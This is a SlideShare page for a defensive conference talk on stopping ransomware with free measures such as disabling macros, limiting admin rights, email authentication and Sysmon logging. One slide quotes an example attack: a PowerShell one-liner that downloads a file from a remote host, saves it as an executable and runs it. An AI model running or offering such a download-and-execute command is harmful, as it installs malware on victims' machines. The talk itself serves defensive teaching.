SlideShare une entreprise Scribd logo

Ransomware 0 admins 1

Télécharger en tant que PPTX, PDF
K
kieranjacobsen

The truth is that money can’t buy security just as it cannot buy happiness. Ransomware has become a cybercriminal’s most profitable enterprise, and something that IT professionals and even the general public now fear. Ransomware is actually pretty simple and unsophisticated code, and at times the damage can stopped with some simple tricks. Best of all, these are FREE!

Technologie
1  sur  36
Ransomware 0: Admins 1 Kieran Jacobsen
Kieran Jacobsen • Work at Readify • Technical Lead • Twitter: @Kjacobsen • Poshsecurity.com • PlanetPowerShell.com
What Is Ransomware?
The impact of ransomware 0% 10% 20% 30% 40% 50% 60% 70% 80% 90% 100% Source: CyberEdge
Threat Hirerachy 1. Malware (viruses, worms, trojans). 2. Phishing. 3. Insider threats. 4. APT. 5. Ransomware 6. Web Application Attacks. 7. SSL-encrypted threats. 8. DoS/DDoS 9. Drive-by & watering-hole Source: CyberEdge
Impacted Verticals 0% 10% 20% 30% 40% 50% 60% 70% 80% Technology Financial Services Healthcare Government Source: CyberEdge
The Rising Cost of Ransomware Bitcoin Exchange Rate (USD)
How Does it Get in? Source: Osterman Research 0% 5% 10% 15% 20% 25% 30% 35% Email link Email attachment Website (non- social media) Social Media USB Stick Business Application Unknown
An Example Attack
cmd /c PowerShell (New-Object System.Net.WebClient).DownloadFile('h ttp://<omitted>/2011/stinfo.pdf','%TM P%yvatu.exe');Start-Process '%TMP%yvatu.exe
Reducing the Risks
1. Disable macros • Significantly impacts infection chain. • 31% of ransomware infections came from email attachments, typically Word document with macros. • Either: • Disable All • Disable macros marked as from the internet • https://decentsecurity.com/enterprise/#/block-office-macros/
2. Don’t run as admin • Significantly impacts infection chain. • Rethink developer and sysadmin privileges. • Old Rant by Jeff Atwood: https://blog.codinghorror.com/the-windows- security-epidemic-dont-run-as-an-administrator/
3. Configure UAC
3. Configure UAC • UAC elevation requests are passed to the Antimalware Scan Interface (AMSI). • https://www.tenforums.com/tutorials/3577- change-user-account-control-uac-settings- windows-10-a.html
4. Open scripts in notepad • .ps1 files do not execute when double-clicked. • Change the following to open in notepad: • .bat (often overlooked) • .vbe and .vbs • .wsh and wsf • .js and .jse • http://www.dankalia.com/tutor/01002/0100201018.htm
5a. EMET • Enhanced Mitigation Experience Toolkit – New EOL date 2018-08-31. • Applies security mitigation technologies to running applications: DEP, SEHOP, Null Page, Heap Spray, EAF, EAF+, Mandatory ASLR, Bottom Up ASLR, Load Lib, Memory Protection, Caller, Sim Exec Flow, Stack Pivot, ASR • Provides configuration SSL/TLS certificate pinning. • Provides ability to block untrusted fonts. • Group Policy ADM/ADMX files. • Bundled with recommended protections for a variety of Microsoft and 3rd Party Apps. • Disable protections on Chrome due to conflicts. • http://www.zdnet.com/article/emet-your-enterprise-for-peak-windows-security/
5b. Inbuilt protections in Windows 10 • Windows: • Windows 10, version 1607 and later • Windows Server 2016 • On for all 64bit processes: DEP, SEHOP and ASLR. • Configurable protections: DEP, DEP-ATL Trunk, SEHOP, Mandatory ASLR, Bottom Up ASLR • Configurable by, well, Group Policy. • https://technet.microsoft.com/en-us/itpro/windows/keep-secure/override- mitigation-options-for-app-related-security-policies?f=255&MSPPError=- 2147217396
6. Deploy Chrome and Firefox • Reduces issues caused by users attempting to install 3rd party browsers. • Chrome is the leader of the pack, followed by Edge for security. • Chrome has ADM/ADMX files for Group Policy, Firefox has 3rd party Group Policy support • Chrome: http://goo.gl/2QvOT • Firefox: https://developer.mozilla.org/en- US/Firefox/Enterprise_deployment
7. Block Ads
7. Block Ads • Internet Explorer: https://decentsecurity.com/adblocking-for- internet-explorer-deployment/ • Edge: https://www.microsoft.com/en- us/store/p/adblock/9nblggh4rfhk • Chrome: https://decentsecurity.com/ublock-for-google-chrome- deployment/ • Firefox: https://decentsecurity.com/ublock-for-firefox- deployment/
8. Filter common email attacks • Identify common phrases and syntax in Phishing and Ransomware emails. • Quarantine them before they get to your users. • https://github.com/SwiftOnSecurity/PhishingRegex
9. Enable SPF, DKIM and DMARC • SPF: Domain owner specifies servers allowed to send email. • DKIM: A domain assets responsibility for sending emails. • DMARC: Combined SPF + DKIM, allows policy assertions and collection of data. • https://dmarc.org/presentations/Email-Authentication- Basics-2015Q2.pdf
9. Enable SPF, DKIM and DMARC Alexa Top 500 - DMARC Usage DMARC No DMARC Source: Detectify
10. Implement SYSMON Sysmon from Microsoft ( https://technet.microsoft.com/en-us/sysinternals/sysmon ) + Configuration from Swift on Security ( https://github.com/SwiftOnSecurity/sysmon-config/ ) + Free SIEM from Gray Log ( https://www.graylog.org/ ) + Sysmon for Graylog ( https://github.com/ion-storm/Graylog_Sysmon ) = Awesome Dashboard
10. Implement SYSMON Source: @ionstorm
Thank You www.expertslive.org.au #expertsliveau

Recommandé

Spyware And Anti Virus Software Presentation
Spyware And Anti Virus Software PresentationSpyware And Anti Virus Software Presentation
Spyware And Anti Virus Software Presentationamy.covington215944
 
Cisco Content Security
Cisco Content SecurityCisco Content Security
Cisco Content SecurityCisco Canada
 
20150616 NPO要知道的駭客攻擊手法
20150616 NPO要知道的駭客攻擊手法20150616 NPO要知道的駭客攻擊手法
20150616 NPO要知道的駭客攻擊手法Net Tuesday Taiwan
 
Seguridad Corporativa Con Internet Explorer 8(1)
Seguridad Corporativa Con Internet Explorer 8(1)Seguridad Corporativa Con Internet Explorer 8(1)
Seguridad Corporativa Con Internet Explorer 8(1)Microsoft Argentina y Uruguay [Official Space]
 
Endpoint Security
Endpoint Security Endpoint Security
Endpoint Security Zack Fabro
 
ATP
ATPATP
ATPLan & Wan Solutions
 
Today's malware aint what you think
Today's malware aint what you thinkToday's malware aint what you think
Today's malware aint what you thinkNathan Winters
 
Cscu module 03 protecting systems using antiviruses
Cscu module 03 protecting systems using antivirusesCscu module 03 protecting systems using antiviruses
Cscu module 03 protecting systems using antivirusesSejahtera Affif
 

Recommandé

Spyware And Anti Virus Software Presentation
Spyware And Anti Virus Software PresentationSpyware And Anti Virus Software Presentation
Spyware And Anti Virus Software Presentationamy.covington215944
 
Cisco Content Security
Cisco Content SecurityCisco Content Security
Cisco Content SecurityCisco Canada
 
20150616 NPO要知道的駭客攻擊手法
20150616 NPO要知道的駭客攻擊手法20150616 NPO要知道的駭客攻擊手法
20150616 NPO要知道的駭客攻擊手法Net Tuesday Taiwan
 
Seguridad Corporativa Con Internet Explorer 8(1)
Seguridad Corporativa Con Internet Explorer 8(1)Seguridad Corporativa Con Internet Explorer 8(1)
Seguridad Corporativa Con Internet Explorer 8(1)Microsoft Argentina y Uruguay [Official Space]
 
Endpoint Security
Endpoint Security Endpoint Security
Endpoint Security Zack Fabro
 
ATP
ATPATP
ATPLan & Wan Solutions
 
Today's malware aint what you think
Today's malware aint what you thinkToday's malware aint what you think
Today's malware aint what you thinkNathan Winters
 
Cscu module 03 protecting systems using antiviruses
Cscu module 03 protecting systems using antivirusesCscu module 03 protecting systems using antiviruses
Cscu module 03 protecting systems using antivirusesSejahtera Affif
 
Dev Abhijet Gagan Chaitanya VII-A ....Salwan public school
Dev Abhijet Gagan Chaitanya VII-A ....Salwan public schoolDev Abhijet Gagan Chaitanya VII-A ....Salwan public school
Dev Abhijet Gagan Chaitanya VII-A ....Salwan public schoolDevku45
 
Intro to Malware Analysis
Intro to Malware AnalysisIntro to Malware Analysis
Intro to Malware Analysiswremes
 
Spyware powerpoint
Spyware powerpointSpyware powerpoint
Spyware powerpointgalaxy201
 
Security is Hard
Security is HardSecurity is Hard
Security is HardMike Murray
 
Microsoft Unified Communications - Securing Exchange Server 2007 Messaging Wh...
Microsoft Unified Communications - Securing Exchange Server 2007 Messaging Wh...Microsoft Unified Communications - Securing Exchange Server 2007 Messaging Wh...
Microsoft Unified Communications - Securing Exchange Server 2007 Messaging Wh...Microsoft Private Cloud
 
Top Ten Ways to Shockproof Your Use of Social Media (Lightning Talk)
Top Ten Ways to Shockproof Your Use of Social Media (Lightning Talk)Top Ten Ways to Shockproof Your Use of Social Media (Lightning Talk)
Top Ten Ways to Shockproof Your Use of Social Media (Lightning Talk)Ben Woelk, CISSP, CPTC
 
Virus encryption
Virus encryptionVirus encryption
Virus encryptionssusere0e9b7
 
Cyber Security – Virus and the Internet
Cyber Security – Virus and the Internet Cyber Security – Virus and the Internet
Cyber Security – Virus and the Internet Love Steven
 
Lab 2
Lab 2Lab 2
Lab 2novelinbabate2
 
The Various Classes of Antivirus!
The Various Classes of Antivirus!The Various Classes of Antivirus!
The Various Classes of Antivirus!Enetfix (Pairsys, Inc.)
 
Content Management System Security
Content Management System SecurityContent Management System Security
Content Management System SecuritySamvel Gevorgyan
 
The Enemy Within: Organizational Insight Through the Eyes of a Webserver
The Enemy Within: Organizational Insight Through the Eyes of a WebserverThe Enemy Within: Organizational Insight Through the Eyes of a Webserver
The Enemy Within: Organizational Insight Through the Eyes of a WebserverRamece Cave
 
Defending Against the Dark Arts of LOLBINS
Defending Against the Dark Arts of LOLBINS Defending Against the Dark Arts of LOLBINS
Defending Against the Dark Arts of LOLBINS Brent Muir
 
Spyware
SpywareSpyware
Spywaresubharock
 
Pentesting Android Apps
Pentesting Android AppsPentesting Android Apps
Pentesting Android AppsAbdelhamid Limami
 
What are the top 10 web security risks?
What are the top 10 web security risks?What are the top 10 web security risks?
What are the top 10 web security risks?Jacklin Berry
 
Security in Android Application, Александр Смирнов, RedMadRobot, Москва
Security in Android Application, Александр Смирнов, RedMadRobot, Москва Security in Android Application, Александр Смирнов, RedMadRobot, Москва
Security in Android Application, Александр Смирнов, RedMadRobot, Москва it-people
 
10 things I’ve learnt about web application security
10 things I’ve learnt about web application security10 things I’ve learnt about web application security
10 things I’ve learnt about web application securityJames Crowley
 
Phishing with Super Bait
Phishing with Super BaitPhishing with Super Bait
Phishing with Super BaitJeremiah Grossman
 
Strayer sec 420
Strayer sec 420Strayer sec 420
Strayer sec 420uopassignment
 
Layer7-WebServices-Hacking-and-Hardening.pdf
Layer7-WebServices-Hacking-and-Hardening.pdfLayer7-WebServices-Hacking-and-Hardening.pdf
Layer7-WebServices-Hacking-and-Hardening.pdfdistortdistort
 
WannaCry (WannaCrypt) Ransomware - Advisory from CERT-IN
WannaCry (WannaCrypt) Ransomware - Advisory from CERT-INWannaCry (WannaCrypt) Ransomware - Advisory from CERT-IN
WannaCry (WannaCrypt) Ransomware - Advisory from CERT-INVijay Sarathy Rangayyan
 

Contenu connexe

Tendances

Dev Abhijet Gagan Chaitanya VII-A ....Salwan public school
Dev Abhijet Gagan Chaitanya VII-A ....Salwan public schoolDev Abhijet Gagan Chaitanya VII-A ....Salwan public school
Dev Abhijet Gagan Chaitanya VII-A ....Salwan public schoolDevku45
 
Intro to Malware Analysis
Intro to Malware AnalysisIntro to Malware Analysis
Intro to Malware Analysiswremes
 
Spyware powerpoint
Spyware powerpointSpyware powerpoint
Spyware powerpointgalaxy201
 
Security is Hard
Security is HardSecurity is Hard
Security is HardMike Murray
 
Microsoft Unified Communications - Securing Exchange Server 2007 Messaging Wh...
Microsoft Unified Communications - Securing Exchange Server 2007 Messaging Wh...Microsoft Unified Communications - Securing Exchange Server 2007 Messaging Wh...
Microsoft Unified Communications - Securing Exchange Server 2007 Messaging Wh...Microsoft Private Cloud
 
Top Ten Ways to Shockproof Your Use of Social Media (Lightning Talk)
Top Ten Ways to Shockproof Your Use of Social Media (Lightning Talk)Top Ten Ways to Shockproof Your Use of Social Media (Lightning Talk)
Top Ten Ways to Shockproof Your Use of Social Media (Lightning Talk)Ben Woelk, CISSP, CPTC
 
Cyber Security – Virus and the Internet
Cyber Security – Virus and the Internet Cyber Security – Virus and the Internet
Cyber Security – Virus and the Internet Love Steven
 
Content Management System Security
Content Management System SecurityContent Management System Security
Content Management System SecuritySamvel Gevorgyan
 
The Enemy Within: Organizational Insight Through the Eyes of a Webserver
The Enemy Within: Organizational Insight Through the Eyes of a WebserverThe Enemy Within: Organizational Insight Through the Eyes of a Webserver
The Enemy Within: Organizational Insight Through the Eyes of a WebserverRamece Cave
 
Defending Against the Dark Arts of LOLBINS
Defending Against the Dark Arts of LOLBINS Defending Against the Dark Arts of LOLBINS
Defending Against the Dark Arts of LOLBINS Brent Muir
 
What are the top 10 web security risks?
What are the top 10 web security risks?What are the top 10 web security risks?
What are the top 10 web security risks?Jacklin Berry
 
Security in Android Application, Александр Смирнов, RedMadRobot, Москва
Security in Android Application, Александр Смирнов, RedMadRobot, Москва Security in Android Application, Александр Смирнов, RedMadRobot, Москва
Security in Android Application, Александр Смирнов, RedMadRobot, Москва it-people
 
10 things I’ve learnt about web application security
10 things I’ve learnt about web application security10 things I’ve learnt about web application security
10 things I’ve learnt about web application securityJames Crowley
 

Tendances (20)

Dev Abhijet Gagan Chaitanya VII-A ....Salwan public school
Dev Abhijet Gagan Chaitanya VII-A ....Salwan public schoolDev Abhijet Gagan Chaitanya VII-A ....Salwan public school
Dev Abhijet Gagan Chaitanya VII-A ....Salwan public school
 
Intro to Malware Analysis
Intro to Malware AnalysisIntro to Malware Analysis
Intro to Malware Analysis
 
Spyware powerpoint
Spyware powerpointSpyware powerpoint
Spyware powerpoint
 
Security is Hard
Security is HardSecurity is Hard
Security is Hard
 
Microsoft Unified Communications - Securing Exchange Server 2007 Messaging Wh...
Microsoft Unified Communications - Securing Exchange Server 2007 Messaging Wh...Microsoft Unified Communications - Securing Exchange Server 2007 Messaging Wh...
Microsoft Unified Communications - Securing Exchange Server 2007 Messaging Wh...
 
Top Ten Ways to Shockproof Your Use of Social Media (Lightning Talk)
Top Ten Ways to Shockproof Your Use of Social Media (Lightning Talk)Top Ten Ways to Shockproof Your Use of Social Media (Lightning Talk)
Top Ten Ways to Shockproof Your Use of Social Media (Lightning Talk)
 
Virus encryption
Virus encryptionVirus encryption
Virus encryption
 
Cyber Security – Virus and the Internet
Cyber Security – Virus and the Internet Cyber Security – Virus and the Internet
Cyber Security – Virus and the Internet
 
Lab 2
Lab 2Lab 2
Lab 2
 
The Various Classes of Antivirus!
The Various Classes of Antivirus!The Various Classes of Antivirus!
The Various Classes of Antivirus!
 
Content Management System Security
Content Management System SecurityContent Management System Security
Content Management System Security
 
The Enemy Within: Organizational Insight Through the Eyes of a Webserver
The Enemy Within: Organizational Insight Through the Eyes of a WebserverThe Enemy Within: Organizational Insight Through the Eyes of a Webserver
The Enemy Within: Organizational Insight Through the Eyes of a Webserver
 
Defending Against the Dark Arts of LOLBINS
Defending Against the Dark Arts of LOLBINS Defending Against the Dark Arts of LOLBINS
Defending Against the Dark Arts of LOLBINS
 
Spyware
SpywareSpyware
Spyware
 
Pentesting Android Apps
Pentesting Android AppsPentesting Android Apps
Pentesting Android Apps
 
What are the top 10 web security risks?
What are the top 10 web security risks?What are the top 10 web security risks?
What are the top 10 web security risks?
 
Security in Android Application, Александр Смирнов, RedMadRobot, Москва
Security in Android Application, Александр Смирнов, RedMadRobot, Москва Security in Android Application, Александр Смирнов, RedMadRobot, Москва
Security in Android Application, Александр Смирнов, RedMadRobot, Москва
 
10 things I’ve learnt about web application security
10 things I’ve learnt about web application security10 things I’ve learnt about web application security
10 things I’ve learnt about web application security
 
Phishing with Super Bait
Phishing with Super BaitPhishing with Super Bait
Phishing with Super Bait
 
Strayer sec 420
Strayer sec 420Strayer sec 420
Strayer sec 420
 

Similaire à Ransomware 0 admins 1

Layer7-WebServices-Hacking-and-Hardening.pdf
Layer7-WebServices-Hacking-and-Hardening.pdfLayer7-WebServices-Hacking-and-Hardening.pdf
Layer7-WebServices-Hacking-and-Hardening.pdfdistortdistort
 
WannaCry (WannaCrypt) Ransomware - Advisory from CERT-IN
WannaCry (WannaCrypt) Ransomware - Advisory from CERT-INWannaCry (WannaCrypt) Ransomware - Advisory from CERT-IN
WannaCry (WannaCrypt) Ransomware - Advisory from CERT-INVijay Sarathy Rangayyan
 
Keep Ahead of Evolving Cyberattacks with OPSWAT and F5 NGINX
Keep Ahead of Evolving Cyberattacks with OPSWAT and F5 NGINXKeep Ahead of Evolving Cyberattacks with OPSWAT and F5 NGINX
Keep Ahead of Evolving Cyberattacks with OPSWAT and F5 NGINXNGINX, Inc.
 
Cisco Security Presentation
Cisco Security PresentationCisco Security Presentation
Cisco Security PresentationSimplex
 
Ransomware History and Monitoring Tips
Ransomware History and Monitoring TipsRansomware History and Monitoring Tips
Ransomware History and Monitoring TipsNetFort
 
Best practices to secure Windows10 with already included features
Best practices to secure Windows10 with already included featuresBest practices to secure Windows10 with already included features
Best practices to secure Windows10 with already included featuresAlexander Benoit
 
How Malware Works - Understanding Software Vulnerabilities
How Malware Works - Understanding Software VulnerabilitiesHow Malware Works - Understanding Software Vulnerabilities
How Malware Works - Understanding Software VulnerabilitiesBunmi Sowande
 
Drive By Downloads: How To Avoid Getting a Cap Popped in Your App
Drive By Downloads: How To Avoid Getting a Cap Popped in Your App Drive By Downloads: How To Avoid Getting a Cap Popped in Your App
Drive By Downloads: How To Avoid Getting a Cap Popped in Your App Cenzic
 
Protecting Your organization from WannaCry Ransomware
Protecting Your organization from WannaCry RansomwareProtecting Your organization from WannaCry Ransomware
Protecting Your organization from WannaCry RansomwareQuick Heal Technologies Ltd.
 
How PCI And PA DSS will change enterprise applications
How PCI And PA DSS will change enterprise applicationsHow PCI And PA DSS will change enterprise applications
How PCI And PA DSS will change enterprise applicationsBen Rothke
 
Scaling Web 2.0 Malware Infection
Scaling Web 2.0 Malware InfectionScaling Web 2.0 Malware Infection
Scaling Web 2.0 Malware InfectionWayne Huang
 
TRISC 2010 - Grapevine , Texas
TRISC 2010 - Grapevine , TexasTRISC 2010 - Grapevine , Texas
TRISC 2010 - Grapevine , TexasAditya K Sood
 
Mobile security
Mobile securityMobile security
Mobile securityStefaan
 
Complete Endpoint protection
Complete Endpoint protectionComplete Endpoint protection
Complete Endpoint protectionxband
 
Protect Yourself Against Today's Cybercriminals and Hackers
Protect Yourself Against Today's Cybercriminals and HackersProtect Yourself Against Today's Cybercriminals and Hackers
Protect Yourself Against Today's Cybercriminals and HackersKaseya
 
A Closer Look at Isolation: Hype or Next Gen Security?
A Closer Look at Isolation: Hype or Next Gen Security?A Closer Look at Isolation: Hype or Next Gen Security?
A Closer Look at Isolation: Hype or Next Gen Security?MenloSecurity
 
"Evolving Cybersecurity Strategies" - Threat protection and incident managment
"Evolving Cybersecurity Strategies" - Threat protection and incident managment"Evolving Cybersecurity Strategies" - Threat protection and incident managment
"Evolving Cybersecurity Strategies" - Threat protection and incident managmentDean Iacovelli
 
The cyber house of horrors - securing the expanding attack surface
The cyber house of horrors - securing the expanding attack surfaceThe cyber house of horrors - securing the expanding attack surface
The cyber house of horrors - securing the expanding attack surfaceJason Bloomberg
 
Solvay secure application layer v2015 seba
Solvay secure application layer v2015 sebaSolvay secure application layer v2015 seba
Solvay secure application layer v2015 sebaSebastien Deleersnyder
 

Similaire à Ransomware 0 admins 1 (20)

Layer7-WebServices-Hacking-and-Hardening.pdf
Layer7-WebServices-Hacking-and-Hardening.pdfLayer7-WebServices-Hacking-and-Hardening.pdf
Layer7-WebServices-Hacking-and-Hardening.pdf
 
WannaCry (WannaCrypt) Ransomware - Advisory from CERT-IN
WannaCry (WannaCrypt) Ransomware - Advisory from CERT-INWannaCry (WannaCrypt) Ransomware - Advisory from CERT-IN
WannaCry (WannaCrypt) Ransomware - Advisory from CERT-IN
 
Keep Ahead of Evolving Cyberattacks with OPSWAT and F5 NGINX
Keep Ahead of Evolving Cyberattacks with OPSWAT and F5 NGINXKeep Ahead of Evolving Cyberattacks with OPSWAT and F5 NGINX
Keep Ahead of Evolving Cyberattacks with OPSWAT and F5 NGINX
 
Cisco Security Presentation
Cisco Security PresentationCisco Security Presentation
Cisco Security Presentation
 
Ransomware History and Monitoring Tips
Ransomware History and Monitoring TipsRansomware History and Monitoring Tips
Ransomware History and Monitoring Tips
 
Best practices to secure Windows10 with already included features
Best practices to secure Windows10 with already included featuresBest practices to secure Windows10 with already included features
Best practices to secure Windows10 with already included features
 
How Malware Works - Understanding Software Vulnerabilities
How Malware Works - Understanding Software VulnerabilitiesHow Malware Works - Understanding Software Vulnerabilities
How Malware Works - Understanding Software Vulnerabilities
 
Drive By Downloads: How To Avoid Getting a Cap Popped in Your App
Drive By Downloads: How To Avoid Getting a Cap Popped in Your App Drive By Downloads: How To Avoid Getting a Cap Popped in Your App
Drive By Downloads: How To Avoid Getting a Cap Popped in Your App
 
Protecting Your organization from WannaCry Ransomware
Protecting Your organization from WannaCry RansomwareProtecting Your organization from WannaCry Ransomware
Protecting Your organization from WannaCry Ransomware
 
Web Application Security
Web Application SecurityWeb Application Security
Web Application Security
 
How PCI And PA DSS will change enterprise applications
How PCI And PA DSS will change enterprise applicationsHow PCI And PA DSS will change enterprise applications
How PCI And PA DSS will change enterprise applications
 
Scaling Web 2.0 Malware Infection
Scaling Web 2.0 Malware InfectionScaling Web 2.0 Malware Infection
Scaling Web 2.0 Malware Infection
 
TRISC 2010 - Grapevine , Texas
TRISC 2010 - Grapevine , TexasTRISC 2010 - Grapevine , Texas
TRISC 2010 - Grapevine , Texas
 
Mobile security
Mobile securityMobile security
Mobile security
 
Complete Endpoint protection
Complete Endpoint protectionComplete Endpoint protection
Complete Endpoint protection
 
Protect Yourself Against Today's Cybercriminals and Hackers
Protect Yourself Against Today's Cybercriminals and HackersProtect Yourself Against Today's Cybercriminals and Hackers
Protect Yourself Against Today's Cybercriminals and Hackers
 
A Closer Look at Isolation: Hype or Next Gen Security?
A Closer Look at Isolation: Hype or Next Gen Security?A Closer Look at Isolation: Hype or Next Gen Security?
A Closer Look at Isolation: Hype or Next Gen Security?
 
"Evolving Cybersecurity Strategies" - Threat protection and incident managment
"Evolving Cybersecurity Strategies" - Threat protection and incident managment"Evolving Cybersecurity Strategies" - Threat protection and incident managment
"Evolving Cybersecurity Strategies" - Threat protection and incident managment
 
The cyber house of horrors - securing the expanding attack surface
The cyber house of horrors - securing the expanding attack surfaceThe cyber house of horrors - securing the expanding attack surface
The cyber house of horrors - securing the expanding attack surface
 
Solvay secure application layer v2015 seba
Solvay secure application layer v2015 sebaSolvay secure application layer v2015 seba
Solvay secure application layer v2015 seba
 

Plus de kieranjacobsen

The Boring Security Talk - Azure Global Bootcamp Melbourne 2019
The Boring Security Talk - Azure Global Bootcamp Melbourne 2019The Boring Security Talk - Azure Global Bootcamp Melbourne 2019
The Boring Security Talk - Azure Global Bootcamp Melbourne 2019kieranjacobsen
 
CrikeyCon VI - The Boring Security Talk
CrikeyCon VI - The Boring Security TalkCrikeyCon VI - The Boring Security Talk
CrikeyCon VI - The Boring Security Talkkieranjacobsen
 
The Boring Security Talk
The Boring Security TalkThe Boring Security Talk
The Boring Security Talkkieranjacobsen
 
The Boring Security Talk
The Boring Security TalkThe Boring Security Talk
The Boring Security Talkkieranjacobsen
 
Secure Azure Deployment Patterns
Secure Azure Deployment PatternsSecure Azure Deployment Patterns
Secure Azure Deployment Patternskieranjacobsen
 
Ransomware 0, Admins 1
Ransomware 0, Admins 1Ransomware 0, Admins 1
Ransomware 0, Admins 1kieranjacobsen
 
DecSecOps in 10 minutes
DecSecOps in 10 minutesDecSecOps in 10 minutes
DecSecOps in 10 minuteskieranjacobsen
 
DevSecOps in 10 minutes
DevSecOps in 10 minutesDevSecOps in 10 minutes
DevSecOps in 10 minuteskieranjacobsen
 
Infrastructure Saturday - Level Up to DevSecOps
Infrastructure Saturday - Level Up to DevSecOpsInfrastructure Saturday - Level Up to DevSecOps
Infrastructure Saturday - Level Up to DevSecOpskieranjacobsen
 
Dev Breakfast: Level up to DevSecOps
Dev Breakfast: Level up to DevSecOpsDev Breakfast: Level up to DevSecOps
Dev Breakfast: Level up to DevSecOpskieranjacobsen
 
DevSecOps - CrikeyCon 2017
DevSecOps - CrikeyCon 2017DevSecOps - CrikeyCon 2017
DevSecOps - CrikeyCon 2017kieranjacobsen
 
Evolving your automation with hybrid workers
Evolving your automation with hybrid workersEvolving your automation with hybrid workers
Evolving your automation with hybrid workerskieranjacobsen
 
Global Azure Bootcamp 2016 - Azure Automation Invades Your Data Centre
Global Azure Bootcamp 2016 - Azure Automation Invades Your Data CentreGlobal Azure Bootcamp 2016 - Azure Automation Invades Your Data Centre
Global Azure Bootcamp 2016 - Azure Automation Invades Your Data Centrekieranjacobsen
 
Azure automation invades your data centre
Azure automation invades your data centreAzure automation invades your data centre
Azure automation invades your data centrekieranjacobsen
 
Exploiting MS15-034 In PowerShell
Exploiting MS15-034 In PowerShellExploiting MS15-034 In PowerShell
Exploiting MS15-034 In PowerShellkieranjacobsen
 
Lateral Movement with PowerShell
Lateral Movement with PowerShellLateral Movement with PowerShell
Lateral Movement with PowerShellkieranjacobsen
 
Fun with the Hak5 Rubber Ducky
Fun with the Hak5 Rubber DuckyFun with the Hak5 Rubber Ducky
Fun with the Hak5 Rubber Duckykieranjacobsen
 
Lateral Movement with PowerShell
Lateral Movement with PowerShellLateral Movement with PowerShell
Lateral Movement with PowerShellkieranjacobsen
 
Enabling Enterprise Mobility
Enabling Enterprise MobilityEnabling Enterprise Mobility
Enabling Enterprise Mobilitykieranjacobsen
 
Advanced PowerShell Automation
Advanced PowerShell AutomationAdvanced PowerShell Automation
Advanced PowerShell Automationkieranjacobsen
 

Plus de kieranjacobsen (20)

The Boring Security Talk - Azure Global Bootcamp Melbourne 2019
The Boring Security Talk - Azure Global Bootcamp Melbourne 2019The Boring Security Talk - Azure Global Bootcamp Melbourne 2019
The Boring Security Talk - Azure Global Bootcamp Melbourne 2019
 
CrikeyCon VI - The Boring Security Talk
CrikeyCon VI - The Boring Security TalkCrikeyCon VI - The Boring Security Talk
CrikeyCon VI - The Boring Security Talk
 
The Boring Security Talk
The Boring Security TalkThe Boring Security Talk
The Boring Security Talk
 
The Boring Security Talk
The Boring Security TalkThe Boring Security Talk
The Boring Security Talk
 
Secure Azure Deployment Patterns
Secure Azure Deployment PatternsSecure Azure Deployment Patterns
Secure Azure Deployment Patterns
 
Ransomware 0, Admins 1
Ransomware 0, Admins 1Ransomware 0, Admins 1
Ransomware 0, Admins 1
 
DecSecOps in 10 minutes
DecSecOps in 10 minutesDecSecOps in 10 minutes
DecSecOps in 10 minutes
 
DevSecOps in 10 minutes
DevSecOps in 10 minutesDevSecOps in 10 minutes
DevSecOps in 10 minutes
 
Infrastructure Saturday - Level Up to DevSecOps
Infrastructure Saturday - Level Up to DevSecOpsInfrastructure Saturday - Level Up to DevSecOps
Infrastructure Saturday - Level Up to DevSecOps
 
Dev Breakfast: Level up to DevSecOps
Dev Breakfast: Level up to DevSecOpsDev Breakfast: Level up to DevSecOps
Dev Breakfast: Level up to DevSecOps
 
DevSecOps - CrikeyCon 2017
DevSecOps - CrikeyCon 2017DevSecOps - CrikeyCon 2017
DevSecOps - CrikeyCon 2017
 
Evolving your automation with hybrid workers
Evolving your automation with hybrid workersEvolving your automation with hybrid workers
Evolving your automation with hybrid workers
 
Global Azure Bootcamp 2016 - Azure Automation Invades Your Data Centre
Global Azure Bootcamp 2016 - Azure Automation Invades Your Data CentreGlobal Azure Bootcamp 2016 - Azure Automation Invades Your Data Centre
Global Azure Bootcamp 2016 - Azure Automation Invades Your Data Centre
 
Azure automation invades your data centre
Azure automation invades your data centreAzure automation invades your data centre
Azure automation invades your data centre
 
Exploiting MS15-034 In PowerShell
Exploiting MS15-034 In PowerShellExploiting MS15-034 In PowerShell
Exploiting MS15-034 In PowerShell
 
Lateral Movement with PowerShell
Lateral Movement with PowerShellLateral Movement with PowerShell
Lateral Movement with PowerShell
 
Fun with the Hak5 Rubber Ducky
Fun with the Hak5 Rubber DuckyFun with the Hak5 Rubber Ducky
Fun with the Hak5 Rubber Ducky
 
Lateral Movement with PowerShell
Lateral Movement with PowerShellLateral Movement with PowerShell
Lateral Movement with PowerShell
 
Enabling Enterprise Mobility
Enabling Enterprise MobilityEnabling Enterprise Mobility
Enabling Enterprise Mobility
 
Advanced PowerShell Automation
Advanced PowerShell AutomationAdvanced PowerShell Automation
Advanced PowerShell Automation
 

Dernier

TrustArc Webinar - Unlock the Power of AI-Driven Data Discovery
TrustArc Webinar - Unlock the Power of AI-Driven Data DiscoveryTrustArc Webinar - Unlock the Power of AI-Driven Data Discovery
TrustArc Webinar - Unlock the Power of AI-Driven Data DiscoveryTrustArc
 
CNIC Information System with Pakdata Cf In Pakistan
CNIC Information System with Pakdata Cf In PakistanCNIC Information System with Pakdata Cf In Pakistan
CNIC Information System with Pakdata Cf In Pakistandanishmna97
 
Spring Boot vs Quarkus the ultimate battle - DevoxxUK
Spring Boot vs Quarkus the ultimate battle - DevoxxUKSpring Boot vs Quarkus the ultimate battle - DevoxxUK
Spring Boot vs Quarkus the ultimate battle - DevoxxUKJago de Vreede
 
Apidays New York 2024 - The Good, the Bad and the Governed by David O'Neill, ...
Apidays New York 2024 - The Good, the Bad and the Governed by David O'Neill, ...Apidays New York 2024 - The Good, the Bad and the Governed by David O'Neill, ...
Apidays New York 2024 - The Good, the Bad and the Governed by David O'Neill, ...apidays
 
DEV meet-up UiPath Document Understanding May 7 2024 Amsterdam
DEV meet-up UiPath Document Understanding May 7 2024 AmsterdamDEV meet-up UiPath Document Understanding May 7 2024 Amsterdam
DEV meet-up UiPath Document Understanding May 7 2024 AmsterdamUiPathCommunity
 
Axa Assurance Maroc - Insurer Innovation Award 2024
Axa Assurance Maroc - Insurer Innovation Award 2024Axa Assurance Maroc - Insurer Innovation Award 2024
Axa Assurance Maroc - Insurer Innovation Award 2024The Digital Insurer
 
presentation ICT roal in 21st century education
presentation ICT roal in 21st century educationpresentation ICT roal in 21st century education
presentation ICT roal in 21st century educationjfdjdjcjdnsjd
 
Architecting Cloud Native Applications
Architecting Cloud Native ApplicationsArchitecting Cloud Native Applications
Architecting Cloud Native ApplicationsWSO2
 
